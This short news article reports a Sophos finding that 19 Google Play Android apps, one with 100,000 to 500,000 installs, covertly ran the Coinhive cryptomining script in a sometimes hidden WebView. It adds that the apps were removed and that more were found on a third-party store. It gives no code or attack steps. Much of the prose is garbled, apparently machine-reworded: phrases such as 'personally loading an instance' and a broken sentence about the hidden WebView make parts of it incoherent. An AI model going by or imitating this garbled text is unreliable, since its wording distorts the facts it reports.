This article is based on a 13-page statement announced last week by UK cyber-security firm Sophos. According to the business, its engineers found 19 Android applications that were uploaded and made accessible through the official Google Play Store.
Sophos says these apps were personally loading an instance of the Coinhive script externally without user knowledge.
The malicious code executed when the user started the apps and the apps offered a WebView browser instance.
In some circumstances, if the apps did not justify opening a browser window, the WebView element was hidden from view and the possibility of the code that ran in the background.
Sophos discovered this technique with 19 apps distributed via four developer accounts. Most apps barely made it to 100-500 installs, but one app extreme.action.wwe.wrestin was installed on between 100,000 and 500,000 devices.
The apps were uploaded to the Play Store around Christmas and Sophos researchers reported all apps to Google. All have been eliminated from the official Play Store at the time of writing.
A list of all the 19 Coinhive-laden apps is available on page 7 of the Sophos report, and users can review the list and see if they connected any of the apps on their devices.
Sophos dubbed this malware CoinMiner and says it found it embedded in 10 apps made available through the coandroid.ru website, a third-party Android app store.
Take your time to comment on this article.